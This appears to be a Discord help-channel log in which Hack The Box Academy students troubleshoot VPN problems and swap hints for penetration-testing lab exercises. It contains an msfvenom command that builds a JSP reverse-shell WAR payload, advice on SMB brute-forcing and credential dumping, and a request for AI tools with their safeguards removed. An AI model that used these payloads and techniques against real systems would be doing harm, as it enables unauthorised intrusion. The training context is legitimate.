#modules
There is no "competitive VPN" on Academy. Academy is just the educational resource HTB provides, sounds like you're on the wrong VPN.
Try changing regions.
no no I'm saying I can connect to the app.hackthebox competitive VPN and it works. On academy I'm trying the academy VPN and it doesn't work. I've tried changing regions too but to no avail
Try rebooting your whole system (not just vm)
Im using WSL2, rebooted entire machine. I was able to connect yesterday just started having issues today
Also tried UDP, doesnt really help
so it's either your computer or htb. you can try changing regions to something totally different like usa/eu or reach out to official htb support for htb platform issues. I'm unfamiliar with wsl so I can't really comment on that, but I know a lot of people have problems with wsl instead of just using a traditional vm. another thing you can do is reset your entire network stack and reboot your computer and try again
netsh i i r r
netsh winsock reset
you'll need to run these commands in an elevated command prompt and it's going to wipe any custom static ip/dns settings in ncpa.cpl's adapters
Still being weird.
Try pwnbox
that will rule out if it's your computer or the platform
don't forget to disconnect from the vpn if you use the pwnbox
Barely works on there either.
ah it's pwnbox issues
then reach out to support
Pwnbox just says "There are no available instances. Please try again later."
It’s just the spawn on that module.
The other module spawns work fine.
I wrote to support lets see
was looking at the status page to make sure
Guess I’m done for the night.
See how it acts tomorrow…
Yea, mine does that sometimes.
ooh
I feel like this is a "connect from India issue"
i tried SG server
Support will be back in an hour oof
ok
it is
at least for pwnbox
Even for VPN
so ovpn would be working right?
Right.
Everything is weird tonight.
Thats unfortunate. Well Ill wait an hour see what support says, keep yall updated
for me it's not night i just started my grind 10 minutes ago
I’m having issues with machines on a particular module.
Idk what’s going on.
starting a day with this error uff
I’m in US.
You must be in a different country.
I've had that before but I just moved to a different module and started there, terminated that and restarted back and it seemed to work
Samsiessss
Okay so I can spawn a Pwnbox for UK region
so now on to VPN pack
Yes, imma gonna just get off the box for a few.
Check back later.
Hello Guys, I need some clarification
Attacking Domain Trusts - Child -> Parent Trusts - from Linux
I try to follow this module with my own Host by using tunneling with ligolo-ng
All commands in the module work on my host with the tunneling setup except the psexec.py and raiseChild.py commands. As you can see in the figure, psexec.py works fine on academy host but not on my own host.
does anyone experience a similar scenario and issue and how do you resolve it ? Thank you!
for kerberos auth you need to add the domain name/host name/dc name to your /etc/hosts
Okay guys so support kinda has no idea either 
ADCS Attacks > Certifried > I can reproduce the attack up to the certipy auth command. Then its always a timeout. I have tried adding -dc-ip, -ns, -dns-tcp, setting a high value to -timeout and rebooting/resetting the lab box 3 or 4 times. Any ideas?
I have also tried running the commands from the pwnbox, same timeouts.
You mean the PwnBox yes?
i saw a meme where people are cooling the transformer with basic cooler
Anyone having trouble with the Windows Event Logs and Analyzing Evil course? Specifically the tapping into ETW module? It won't let me post the screenshot in here for some reason, but I can't navigate to \Tools\GhostPack Compiled Binaries in Powershell as an Administrator as it keeps saying that the "Compiled" argument cannot be used. I'm a noob at this, and I can't seem to find any fix online, and have been struggling with this particular part for the last week. If anyone has any suggestions, I would appreciate it!
When you have spaces in the path you should surround the path with quotes
Powershell was thinking your path ended at Ghostpack and thought u specified Compiled as argument
cd "C:\Program Files\"
This worked. I'm just struggling on finding what I need in the etw.json file now, and I appreciate your help.
i am currently at the module windows priv escalation, i need an admin powershell, but i cannot type in a "@" when i get prompted for the password, is that right?
is the box in UK keyboard layout 😅
i think so...
i tested with a notepad...but i do not find the "@"
I was half way into typing this
Can't do anything, have to reconnect openvpn every time
I am unable to connect on any VPNs
Seems like an outage
i brought up onscreen keyboard (this is my win10 VM)
on ur keyboard it should be "
I'm able to connect and ping for maybe 1 or 2 minutes
but then it becomes unreachable
Losing all revshells and progress
Which VPN, region?
ah nice one, thank you!!
Yup yup, my current work around as well..
for me I am not even able to connect via VPN, ( though HTB lab VPN works fine)
I have tried eu2 , eu1, eu5, us1 ( TCP , UDP ) as well, and still no luck
thats my problem
hmm hey there
so u got the repo wrong
it asks for password and username because its a private repo
@tender nimbus
is the repo private?
as in can u see the repo in github on incognito tab?
if it is private and you want to clone it then install github cli
and then run gh auth login
You were right 🙂

it was the wrong git ^^ thanks for your help and advice
Hi. Yup, I, again, have a problem. I tried to install Ubuntu for wsl2 on my windows vm, I checked the right option on Virtualbox to do a nested virtualization, but I still can't install Ubuntu. When I do systeminfo in the vm, it says : "An hypervisor has been detected, features of Hyper-V will not be displayed". I tried turning off hypervisor on the vm but it didn't work too
Wouldn't be better to install directly Ubuntu if you are using VBox avoiding nesting things?
When I was in a bootcamp for web dev, they say Ubuntu in wsl is great 
I already have Parrot OS in another VM. I'm just following the module Setting Up, section Windows
sorry to bother you again but do you know why i cant run the script here? Why should it be a zip?
Yeah when i want to launch the script i have this at info its about PyPhisher (educational purposes)
which script is this ?
what module is this for?
Its not for a module, yesterday i was at Cybersec Europe 2024 and there was a lab where we used it so i was curious and i want to try it at home rn to see how this kind of stuff works
Module: Using Web Proxies > Burp Intruder
I have attempted to fuzz using the common.txt list on the target, the only things that show up as existing before the module times out is ||.hta, .htaccess and .htpasswd|| which are all 403 errors. I have looked in the source for all these pages for the flag, its not there. Im clearly doing something wrong if the module is timing out before I can find a html file. Any ideas?
Since AI like ChatGPT likes to filter questions if they seem questionable, do you have any open source AI or other AI tools you use that are unfiltered
Since intruder in the free version is damn slow I did solve it with FFUF.
EDIT: I have spun up the lab quickly and I had a hit with Intruder as well. I have unchecked the "Payload Encoding" (but shouldn't matter), and just make sure your placeholder is well positioned
@tender nimbus which company demoed pyphisher
Headmind partners, they did that to sensitise other companies so they are aware of phishing
are you belgian?
Yupp
🙂
keep the conversation in English
How did you solve it with FFUF?
in the same way you do fuzz for directories but you add the -e flag for ext
👍
okidoki
i'm struggling with the end of module assignment for the module shells
Currently I am trying to exploit the first machine via the tomcat server
I have tried uploading a jsp reverse shell payload in war file format
the tomcat server seems to timeout when i upload the war file
Hey all, is anyone facing any high latency on Academy lately 1000+ ms in their region for Pwnbox
well I don't know and don't remember if there is a firewall I didn't check when I got access but anyhow which port are you using to get the revshell? I can see from my notes that I did this from the pwnbox for some reason and it worked
well i do it from the machine that has the foothold
since the tomcat server is on an internal network
it is and I didn't have any issue getting a call back
i can connect to the tomcat server
it's the upload that doesn't work
so clicking on the deploy button on the manager app the browser times out
Ask su... wait a second

let me see if I have time to spin up the target, in case someone else will help you
Bro that page looks scuffed I don't recall the page looking like that
Could be misremembering though
true that! I got the same feeling
And at least eliminates the feeling of it being scuffed
maybe i will spin up a proxy and use firefox on my machine
Brother
question for intro to malware static section, I placed the exe on the C:\Alpha\static but still no flag
Firefox exists on the jump host
strange i don't see it
Just type firefox in the terminal
Again
I am having trouble with HTB Academy module Password Attack - Pass the Ticket with Windows. I have connected to the target with RDP and opened a cmdline terminal. When I export the keys, I only get 2 keys for username MS01$, not any of the other users listed. I used Mimikatz and Rubeus and get the same results for both. What am I doing wrong? Need a hint.
This probably eliminates half your issues
Try dumping lsass?
Lsa != lsass
So they store different things
Will try that.
maybe i'm on the wrong page
that's the section of the page i am using to load the war file
That looks correct
mmm i figure
I generated payload using msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=4444 -f war -o reverse_shell.war
I'm having trouble with Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux. I've tried getting GetUserSPNs.py to return the TGS for sapsso with both users wley and forend. TCPDUMP shows me reaching out to 172.16.5.238 and it not responding, eventually I get error 'Principal: FREIGHTLOGISTICS.LOCAL\sapsso - [Errno 104] Connection reset by peer'. Any hints for me?
Try changing vpn region
OK - which region do you suggest? I'm currently on US Academy 3.
ok will give it a try thanks
Hey MarcieLee. Thanks for the hint, but the problem was that I was stupid. Didn't use the cmd terminal as admin the first time. Everything is fine now, and was able to export all keys.
solved now right?
GM! I'm new in HTB, I got into the pen testing job path, I don't use the pwnbox, I use my own VM. Every section exercise HTB gave me a VPN file to download and exec on my VM, but as I am moving forward with new sections and modules, when I have to solve an exercise HTB doesn't show me the option to download the VPN file. Should I re-download the old VPN files I downloaded before? Or am I supposed to download a different VPN for every different section / module? Thanks in advance
you'll only need to download it once
only reason to download again is if you're changing vpn servers
Got it thanks 🙏🏼
I am doing RDP to the Target Machine and this is what I get? Any suggestions what might be wrong?
which module is that?
Its Windows Attack and Defense
hmmm i still get connection reset when trying to upload my war file payload to the tomcat server
ok, i've not done that one yet
Other section's machines are working fine, this section tho :((((
but the message you get seems like the workstation you are attempting to logon from is not joined to the domain perhaps?
But its HTB's own workstation, Thats not possible
Try EU vpns
It's still possible
perhaps it's then due to permissions
ALright lemme try
yeah indeed
The US vpns seem busted
i've tried a de vpn
Hiiii
There's no "de" vpn
it's strange though cos fair enough if the vpn is busted
but i wouldn't expect problems between machines on the other side of the vpn
There's EU-Academy-[1..5]
If i use kali linux instead of parrot is there any problem
nope
When playing machines
use whatever you like
Vpn dictates the target spawn conditions
Is that to me
Pwnbox region dictates pwnbox spawn conditions
It's in general
my bad
As I've repeated this ad nauseam
Hmmm
Pwnbox region != vpn region
Did kali have everything to play machines
I just tried with several us vpn servers btw @zealous rune they all time out; the EU one worked first try
If you're talking about machines on the main site, and not academy, wrong channel
no, a distro will not have everything you need to complete some boxes
thanks for testing that
Np literally uploaded instantly on the EU one, no waiting
Sorry I didn't know that
I just tried EU Academy 2 and the command I was trying worked. Both US Academy 3 and 4 are broken for this exercise.
Would you suspect that the VPN is working but perhaps the VM environment is broken? Or you combine those two generally into VPN when you say that?
At least for modules that may have internal networking
VPN dictates the target spawn conditions
If changing to EU fixed it; then something on the US VPN network is causing the VM to not spawn appropriately
is it recommended to use the pwnbox provided on the HTB website, or to vpn connect using a vm on your own computer?
Whichever is more comfortable for you
I generally only use the pwnbox to troubleshoot
I have more control over my own vm and tools
And I don't have to reinstall those tools every time I launch it
i'm downloading a kali iso and it's 3gb which is taking my computer forever to download 😭 so i just wanted to ask in case the pwnbox is, like, amazing in comparison to a personal vm
If changing to other vpns also doesn't resolve; then the vm env is broken
¯_(ツ)_/¯
Once you set it up it's more of a convenience thing
good enough for me, i'll wait out the download
Also what are you on dial-up? 100Mbps caveman internet?
i think my vm is better than the pwnbox in every way
im on my phone's data
except for python
That's because it's yours 
exactly
Oof yeah tethering sucks
Especially depending on your carrier
Thanks MarcieLee - does a status.htba.com exist or something similar? Would be good to know to avoid something not working right.
the only thing the pwnbox has me beat in is having python 2.7
Skill issue
*2john begs to differ
worked
TY
thanks
never used a 2john script in my life
Well if you do password attacks, you'll use it
frustrating, but that connection on the reverse shell listener makes it worthwhile!
fuck!
:)
(Venvs are the way to go)
Or if you're brave enough, debug the script
To make it work with 3
Blackarch is also 10x more work to set up
is there something up with the pwnbox instances? i keep getting this popup
Try changing pwnbox regions
i did
but i keep getting the error
also when i try to rdp via my kali, rdp cannot connect to the target ip. Ive been trying to do this exercise for the last 3 hrs and i just keep having issue connecting to the target
tried all eu servers
Since I experienced this issue yesterday
I got it fixed by downloading the ovpn again
Pwnbox region != vpn region
Downloading the ovpn would have no bearing on the pwnbox
Pwnbox region = Pwnbox location right?
I'm based in SG and I've never had issues with the latency while using sg pwnboxes. but sometimes i do swap around the eu servers when the sg latency gets very high
Yeah latency can be a factor with vpn+pwnbox
but tonight, i just have difficulty getting the pwnbox to start and/or getting rdp connection to the target via kali :/
¯_(ツ)_/¯
I take it the target is meant to be rdped to
Also when you change the vpn region you have to respawn the target
yea it's this exercise
😮 really
Yes
ok i'll try that
Again vpn region dictates target spawn
Your initial target spawned on your first vpn server
And if you don't reset it, it remains on that server
ok - retrying
How does one redirect traffic to ZAP? ZAP doesnt seem to have a built in browser like burpsuite.
getting this when I try, must be doing something wrong
Is zap open when you have the proxy set?
yup, that it is
Also are you using the extension "FoxyProxy"
I wonder if I can do the zap questions using burpsuite 
Probably
and nope, am not
They both do the same thing
plugins like foxyproxy and switchyomega quickly let you set proxy settings for your browser, or you can manually set them. From zap you can choose manual scan and launch a browser which will launch with the proxy already configured
Zap just doesn't have the limits that Burp does
what one of these would I use to convert my payload to md5?
server is expecting an md5 of a username
(trying to fuzz to get a cookie)
nvm i just converted it to md5 manually
finished the shells module
thanks all for advices
thanks @fathom pendant for the shout to use a different vpn
had me stuck for a good while
Yeah the vpns seemed quite buggy today
np i'm chatting with support now about it :) told them that the US VPNs seem to be having issues
the EU one worked first shot
yeah. it's actually quite a tricky little thing. Cos i never even thought the vpn could cause this issue, since the interactions were between machines on an internal network on the other side of the vpn
it wasn't even like i had crazy latency between my machine and the rdp foothold machine
Module: Introduction to Windows Evasion Techniques
Missing tools folder?
does the module state there's a tools folder?
What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?
does anyone know how to find this
hmm i think this might have come up before
but I've just completed the shells module and it doesn't show as completed in the Dashboard
under cpts, PHP web shell
Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: xxxx.gif)
i can upload the php file but when i redirect to the following path, /image/vendor/connect.php, it shows a not found error. can someone guide me. thanks
yea
can anyone please help me
reset twice now
there's a find command they give you
they also expect you to be ssh to the target
as per the first question instructions
You are on the wrong VM. The tools folder is only on the Evasion-Dev VM
this is the part i am confused with
Oh yea. Thanks
then when it prompts to password you can just paste the password
[terminal you need to add shift to the paste shortcut]
what exactly confuses you about this?
i believe the module/section tells you how to connect via ssh
you messed up the error redirect
^
put a space after the last character
2>/dev/null shouldn't have anything directly before it
I did that but it’s not bringing out any error message or any output
you're missing the - before 28k
-size -28k
also
it's -name *.conf
it seems like either you copy/pasted wrong
or you changed things in the copy/paste without knowing
from what it looks like there's some missing info for it to grab what you're looking for
(note the error redirect also hides if it doesn't work)
Module: System Management
Section: Task Scheduling
Link of Section:
Description:
I don't understand what answer this question expects... 🤔
Module:
Section:
Link of Section:
Description:
follow this format when asking question
systemctl cat [servicename]
you can see a lot about systemctl using man systemctl
can yall pin this?
so i did this, its ok?
feel free to do so
we plebs can't
it's up to mods/admins/staff
and even if it's pinned no one reads that shit
so...
would be nice if others did that, it really helps speed up replying to a question
ikr
heck half the time people's questions have been answered via searching
also very true
just let it complete
Actually I would have detailed the section/module for other questions.
But for this one I supposed that the question was precise enough for it to not be relevant
ok
don't do ctrl-C or anything
when you ctrl-C it cancels and doesn't provide any output
it still helps
is it normal that it takes time?
too many people just repeat the question and don't state what they have/haven't tried
it can take a few minutes; take into consideration that it's 1 identifying open ports and 2 running a version check against the found ports
normally running nmap scan on pwnbox will save more time
eh
i wouldn't advise just spinning up the pwnbox to do nmap scans
not to mention it can cause more issues if you don't terminate your vpn connection
ok, but now i cant see the vs of the port 8080
is vpn working for everyone?
what is your goal?
Yes, try switching to a different server or re-download the config if its not working
VPN issues? Slow connections? Can't reach machines? Start here!
it is working for others?
i try to complete Service Scanning in Getting Started
and i asked" Perform an Nmap scan of the target. What does Nmap display as the version of the service running on port 8080?"
sudo nmap <ip> -sV -sC -p 8080 --min-rate 1000
Review the section, the answer on what you need to do is there
there is something wrong with academy vpn it doesnt work
there's very little point to using --min-rate if you're only hitting one port i think
does vpn work for anyone?
Again yes VPN servers are working. I provided a troubleshooting guide from htb to help you out. Reach out to support if you are so set on it being on their end.
<@&861185840277487616>
i tried running normal htb machines vpn and it works fine
Oh sry my bad
Sry bro fr
i downloaded new vpn connection file and it doesnt work so i think from myside its fine
Try a different server then
i switched from eu to us
ty
so i run nmap again and its still didnt work for me
You're leaving out a very important flag for nmap that will provide the results you seek
amm and what is that?
review the section you are on, the section provides an example
ok it works now
sC? or p?
You asking or trying? 😛
both🙃
-p- tells nmap to scan all ports, default is top 1000, you can also do -p 22 to scan a specific port, I will let you read up on the other one 😉
combine into -sVC
use sudo
whats the point of silver annual subscription
monthly billing for a year is 216 but annual is 490 how does it make sense
even now
same with gold how come its 1260 its just scam lol
..
The annual subscription gives you access to the mentioned content right away, while the monthly one gives you a certain amount of cubes, well, each month.
If those cubes are not enough, you'd have to wait one month to receive more.
The monthly subscription may be cheaper in total, but it also takes longer to unlock a given amount of courses.
what if i buy silver monthly and then cancel and buy again like this for 12 times
Well, that's the trade-off.
More money for instant access, or less money for a more "time gated" approach.
Thank you @tranquil axle , that was the solution.
The annual subscription also includes an exam voucher and the option to view a walkthrough
Against what are you running this one
I did that accidentally, (i was checking whether clicking another subscribe button would give me a popup for card details, but it just went through without giving me any popup), fortunately, the help staff gave me back my previous subscription and cancelled the new one.. (also there was a renew option that you had to wait for a month before buying another monthly subscription,)
Annual also includes a voucher $250 plus some other perks
i cant afford it anyways
You can also buy a Platinum subscription. Then you get 1000 cubes per month
hmm platinum seems a good option
im still at 70 cubes 😭
You aren't connected to vpn, that's why i think you get Http 404 error
Skill issue
If they weren't connected to vpn they wouldn't see the port as open
Ooo,
so.. what is my problem?
Not yet i had to leave so still the same problem with the ZIP problem
Likely the vpn, are you using a us academy vpn?
If so, switch to one of the EU ones
To do so; first ctrl-c on the vpn that's running
Then switch to one of the EU ones and download a new vpn
Note: you'll also have to respawn the target
It could also be that it's designed to be a 404
¯_(ツ)_/¯
Module context matters
In future; please include module name and section name when asking for help
It helps others provide better troubleshooting than guess and check methods of troubleshooting
is the username for the attacking gitlab section in attacking common applications on the xato list in seclists
Child
Sit down and do your work
If you want more cubes, buy them
You can't go + in cubes by just doing modules
Tier0 gives back 100%, tier 1+ gives back 20%
There's never a net gain
I mean
I found the keytab of user ||svc_workstations|| in crontab and used it to impersonate
It kinda tells you what to do
||keytab extract||
There's a subsection regarding it
||keytab extract|| gives me ||AES-256 HASH|| hash for user ||svc_workstations||
and i cannot find other keytab
are you sure? Have you done a ls in the directory?
could someone help on this
Use whatever wordlists the module primed you to use
😂 found it
perfect hint
do you know javascript
I barely know English my guy
Lol no
wtf are you doing here then 
ok can you review my add-on please
No
As it has nothing to do with an academy module
Go to #programming (read and follow #welcome to access)
host unreachable, seems like the host isn't online
hey team can some one help me with password attacks module and Pass the ticket from linux section last question
dont ask to ask buddy just paste the questions here
“Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).”
Well, did you find the ticket?
with this question
What have you tried
Hint; use the tool showcased at the end of the section
It should reveal some nice keytab and ccache file locations
Also the full usernames for this section have been user@domain
as i understand i need to use both of them right?
Only one or the other
If you use the ccache you don't need the keytab and vice versa
do i need to add @inlanefreight.local or something to the username
Hey! I was wondering if anyone could help me figure out how to read the contents of a text file with SMB. I am new to all this so if I need to supply more information let me know.
is this right cache?
I'm not answering yes or no. Try using it and see
Try and fail before asking
Brother
Still a spoiler
As it contains the filename
download the file using get <FILENAME>, you can read it then
That works too
This worked. Thank you so much! I was stuck here for a solid hour banging my head against a wall 🤣
I did this and it told me the size and length but not the contents.
Man its my first day 😭
Holy wait you are so right I just had an aha moment
😭
I believe you can also do !cat filename from within smb (if you're on linux)
! Indicates to smb you want to run a command on your local system
Neat! Thanks so much again for the help!
ive found the username ||hacker||, but it still doesn't accept the answer
nvm
did you get it?
for the Mongod machine. how do I connect? bash: mongo: command not found
Wrong channel, read and follow #welcome
This is a starting point machine yeah?
#starting-point would be the place for it
Also (install the tool)
Read again what Marcie has written. Especially the part with #welcome
thanks
@errant siren i have the same problem too
i feel like there is an error getting the flag
i dont think people have even done that module here
There are people that have
they just aren't active
you can also chill out
have you tried changing vpn regions and doing your enumeration again? I take it the module taught you basic enum tooling
So many people sign up and don't do anything
yeah it's insane
The module describes a program with which you can enumerate a WP site. Use it
Every user who has created an account at some point is counted. Whether active or not
hacking WordPress Skill Assessment - Bullshit Module
The program mentioned above shows you everything you need to know to find the flag
You don't need a shell to find the flag
what?
Just dumped all my cubes to revisit the basics of EVERYTHING apparently the only good thing about my computer is showing me how much of an idiot I actually am.
Thank you technology...
stares at my pc what are you hiding from me
Binary exploitation is a core tenet of penetration testing, but learning it can be daunting. This is mainly due to the complexity of binary files and their underlying machine code and how binary files interact with computer memory and the processor. To learn the basics of binary exploitation, we must first have a firm grasp of Computer Architect...
Gz
nice flex
someone help with this?
Probably not, this isn't the place for that. This channel is about the modules on the HTB Academy platform.
is #red-team more appropriate?
Feeling like an idiot is a natural side effect of learning something new. Some days, feeling stupid is basically all I do. Also I routinely go back and revisit fundamental modules. The fundamentals are everything. Don't be hard on yourself if you feel like you're learning too slow, or having difficulty grasping a certain concept. The content here is meant to challenge you.
Rocky fundamentals can lead to bad habits
Anyone have any tips for this Evil-WinRM error: Error:
An error of type HTTPClient::ReceiveTimeoutError happened, message is execution expired
Error: Exiting with code 1
I'm doing the Attacking Enterprise Network module and I've uninstalled and reinstalled the latest version of evil-winrm, ruby, etc. Tried a custom OpenSSL conf file and that's not helping either. I've tried accessing the necessary host via RDP but that's proving unsuccessful as well
Edit: Should add I'm on ParrotOS in case that's relevant
looks like a timeout connecting to the target. i think evil-winrm has a timeout argument -t <seconds>, try a larger timeout window
Yeah I was looking for a timeout argument in the help output but there wasn't one. I tried it just now and it's an invalid option
I know xfreerdp has one which is helpful wish there was one for evil-winrm
If you're running the US vpn, try EU
Okay I'll give that a shot
I wrote to support a while ago regarding US vpns being terrible
Thank you so much it worked! You have no idea how much this has been frustrating me, since last night I was trying to get this to work
Again US vpn being shit has been brought up to the support team
So hopefully they fix it
last seen 7 hours ago
Was my chat with a support rep earlier today
yes I have a problem with the VPN too
@west canopy @fathom pendant Thanks for the words of wisdom.
I stumbled a bunch
and some of it was me just learning to just read the god damn question 
However, first of all, we have to fail. It is an unavoidable and essential part of learning. This is one of the parts of the learning process which make us successful. Experience is built on failures. It explains that we know how to handle different and sometimes adverse situations where something does not work as expected.
This was much needed lol
check the last line and the whole thing
As long as you question and learn why you failed you will ultimately succeed
This is the way
Why did this command fail? Oh I missed the syntax --> fix
my guy that was about a month ago 😭
in nmap module in port scanning section, it says (i think) "if the filtered port scan takes long time, with syn scan(-sS), it means the port is unreachable due to other reason... then it sends an ICMP request to another filtered port as an example where the output is received fast, with an ICMP error code 3, indicating that the firewall on the port is rejecting the packet".
is the statement true, or i am not understanding something?
my understanding is that, if its even a -sS option scan on filtered port, and it takes longer time, it's due to other reason, and if it takes shorter time, it's due to firewall?
you're thinking backwards
If you suspect a firewall, try -V5
if you're scanning -sS directly on a filtered port that's different
in my experience, something like a host based firewall (i.e. Windows Firewall) will have a port show as filtered
thanks
filtered is just nmap's way of saying whatever packet we sent did not get any response from the server, period.
under the ICMP error 3 (Host unreachable) there's several sub-errors as well
which may get sent back
if a port is closed, it responds with RST
the iana link i sent earlier contains all the ICMP errors
RFC 792 and RFC 1812 cover ICMP error code 3
https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml#icmp-parameters-codes-3 -- direct link to section
marcie you never cease to amaze me with your knowledge on these niche things
i think of ICMP as a ping pong ball
mastered google-fu
and who better to trust about a protocol than IANA
thanks
if you're getting a reroute, it's ICMP error 5
don't tell them we just google the answer or they'll start trying that first
ICMP is just traceroute, professional ping pong but with ores as ping pong paddles due to regulations of the sport
hhhhh
I mean, im surprised the default answer to peoples questions hasn't just become "Use ChatGPT bro"
traceroute is built on ICMP
i think linux traceroute uses UDP by default though?
asking an experienced person directly is different, their answers make more sense
it depends
Yes, ICMP is pingpong, and traceroute is with ores and you have to wear something sexy for the crowds
but i think most stuff now uses TCP/IP stack protocols
there's nothing wrong with asking for help, and i wasn't really talking about you specifically, we get a ton of people who just don't google the most basic stuff first. more making a comment on it in general.
^
true
i will be the first to say no one ever got anywhere alone, we have all learned from someone. where would humanity be without each other.
he was more making fun of the fact that half of the time my answers are just "Googled it"
I dont make fun of people, I make people with fun
ayo???
Don't sweat the petty things in life, pet the sweaty things
AYOOO?????
Cybersecurity is just an expression of my ego
(HUGE)
Hope they announce the new CRTO competitor cert tomorrow
hey man. I've been experiencing the same thing for 3 days now. 3 nights ago i was able to login to the DNN portal, download the .exe files nec. for priv esc., executed them and got a reverse shell as the NT Authority user on dev01. Got late and I shut it down thinking the persistence we had set up i could get right back with no problem. hahahaha yeah right. for 3 full days now, 3 new vms, anything and everything i could think of. I've messaged support a couple of times. the login portal will load right up. But after entering creds it just times out. please tell me u found something....
Honestly I just kept respawning the target until I could log in without issues, wish I could give you a better answer than that. Try switching your VPN servers, I did that too and today that solved another issue I was having today. I switched from US to EU VPN today and that seemed to really help with connection issues today
I have done all that. so that's what you did, kept messing with it until u found a host that would let you log in?
thanks man. That helps more than u know. I'm trying to figure out what I'm doing wrong u know. But hey, I've gone back through the module several times... lol
Might be a good time to learn how to script your exploits
anyone knew this?
Looks like you are navigating to a file
Don't do that, navigate to the directory
Just go to /images/vendor
then ls
Are you trying to execute a webshell?
genuinely what you could be doing wrong is using the US vpn file
you might need to use a tool like burp as shown in the module to check this
you have the webshell correct?
you should be doing navigation from within the shell
this module is VERY MUCH step-by-step
I also take it you're referring to the "Shells and Payloads" module
as there's no "PHP shells" module
¯_(ツ)_/¯
Blud dipped immediately too, yee haw 🤠
for some other modules i can see some questioning
but this specific module is step-by-step
because the focus is on actually interacting with the shells
as each type of shell has their own ways
basic webshells being the ?var="system command"
The road to shell is paved with good intentions
(and misconfigurations)
oh switch to a diff vpn server
you're a day late and a dollar short on that suggestion lmao
yeah i just saw when that was posted T-T
It seems the US VPNs are having issues with targets that have any level of internal networks
it randomly went to a day before chat
but discord is improving
US VPN seems fine for single hosted targets (at least afaik, haven't tested)
Messaged support earlier, they said they raised the issue and will get back when resolved

yeah. correct. just to check i need to change the content-type right to images/gif before forwarding in burp.
I don't know if i'd say improving. There are far less people around in general, and to help with questions, and the mods still seem impossible to get help from
I've been trying to get my account verified for over 24 hrs now so I can use the other channels, and it seems I am being ignored
i meant discord as in the app
dont u just need an account identifier thats found on your htb acc
you do
but if it's linked to another account, it has to be first unlinked for you to link it again
ah i see
How do I unlink it? That account is deleted
backend basically ticks a true/false flag
you can't a mod/admin has to
support has nothing to do with the discord
That was my impression too
no not discord, htb
@urban sage can we hook this man up
This is a discord related issue
linking has nothing to do with the platform
ohh
I reached out to Nightwolf, he is busy
i mean we can see if @slender shoal can do something
Also reached out to him
¯_(ツ)_/¯
Started with Tejas, thanks for the support though, marcie
i haven't seen him do much of anything in the past like month
patience my child
Yeah i would generally go with people who have the "mod" role
not Staff in general
I am patient, it's just I understand this discord has lost a lot of members and grown in mods, but mods are not around to help
Just something I have noticed
And most mods are volunteers
the ones that also happen to be staff aren't employed to be discord help
Huh? I was under the impression they were given HTB enterprise accounts
because you care about the community and want to see it grow positively
One moment. I'm almost to a proper keyboard.
BUT YOUR POINT IS VALID
Any communities with nerds are bound to be horrific
eh up until recently moderation was fairly consistent, then THE INCIDENT which i'm not gonna get into and has already been discussed ad nauseum
Sounds scandalous
just decisions that people didn't agree with
I am not interested either way, just here for the Certs
but again decisions nonetheless that we don't know about
based and redpilled
Complete side tangent. I've lost count over the years the number of distinct unrelated events "the incident" has been used to refer to. 😂
yeah
Must have been here for awhile...
Sr. work the same as real-life? 7 years of service?
Thank you @urban sage
I've been around in the server since 2019 in some capacity. I haven't been a moderator that entire time though.
Evening all.
Module: Using Web Proxies > ZAP Scanner
I am struggling to find the vulnerability I'm meant to use here despite following the instructions in the thread. I'm not sure if I'm blind or if I'm doing something wrong. Could someone give me a hint and what I should be looking for?
It can take a bit to find it
note it will be a "CRITICAL" vulnerability
i think it took like 5-10 minutes to find it
I think the first vuln I found wasn't what they were looking for so I just had to wait
I could never get anything higher than a med when I did it, and I waited for the scans to finish.
So i've managed to get ||Remote OS Command Injection|| from the results. That being said I'm not sure how to exploit it, it isn't clear from the result. Is this something I should jump into msfconsole or?
disregard, figured it out
Is shells and payloads skills assessment module laggy or is it my machine?
The whole platform is laggy today
I'm on that one. Having a hard time with the first host. Browser keeps timing out when I upload. Going to work on something else in the meantime. You using VM or pwn?
The user is good but this is the full name not username
what does that number mean
hi guys
Hi Guys i need some help
I'm trying to solve this question from HTB Academy password attacks (Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.) and i found the password and logged in to the smb and then cd to a share directory but i can't list its content, i tried everything!!
smb: > dir
NT_STATUS_ACCESS_DENIED listing *
i really need help
which tool you used to bruteforce password
i already found the creds, i used hydra and crackmapexec, but i can't list the connent of the shared folder
content *
use metasploit
as shown in module
and don't stop even after getting correct creds
sure i will try it right now
i solved it, Thank You so much dude <3333
i am also doing password attack module.
Great i wish you all the luck !
I suggest skimming over this section again, the answer is there
done, I made it complicated for myself
It's alright, that section is a long one
took me some brain power as well
attacking common applications. skills assessment 2. any hints for enumerating nagios xi for password?
why do i keep getting these errors? "Connection reset by peer"
is this a connection error?
go back and "check in the fox", I think me and you can get away with this without spoiling too much
You using pwnbox and connecting with a vm? The connections will conflict then.
Yeaaahh
Introduction To Splunk & SPL --> open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.
The query i've used:
||index=* sourcetype=WinEventLog:Security EventCode=4624
| bucket span=10m _time
| stats count by _time, Account_Name
| sort - count
| head 10||
But all accounts found this way don't seem to be the right answer. I've tried some scrolling and sorting but didn't get any other account names. Any hints?
Introduction To Malware Analysis: Skills Assessment. I can't figure out the answer to the last question. Tried following the hint and just not getting it. If anyone can help I'd be grateful. 🙂
Hello world
Try to answer instead “which accounts only logged in in a 10m window and never before or after again and of those which has the highest successful logins”
kinda stuck here...WINDOWS PRIVILEGE ESCALATION / Other Files
i want to analyze the plum.sqlite file of the notes app. but i can't change the execution policy and therefore can't analyze the file directly on the windows host. but i also can't get it to the linux host....
Pwn
I'm working through the Footprinting module and am trying to get through the DNS exercises. I am down to the last one looking for the FQDN for the host with IP ending in 203 and can't find this host. I checked the hint and have tried almost all of the wordlists from SecLists with dnsenum. Anyone have any ideas on what I'm missing?
You have to find all the zones.
Take the smallest list. If you can't find anything, take the next largest list. Lists with 5000 entries are too big
Is it even right to concentrate on this file?
Okay, thank you! I'll give that a try
When you say find all the zones, you're talking about through zone transfers, right? Like executing dig axfr <dnsZone> @<dnsIP>
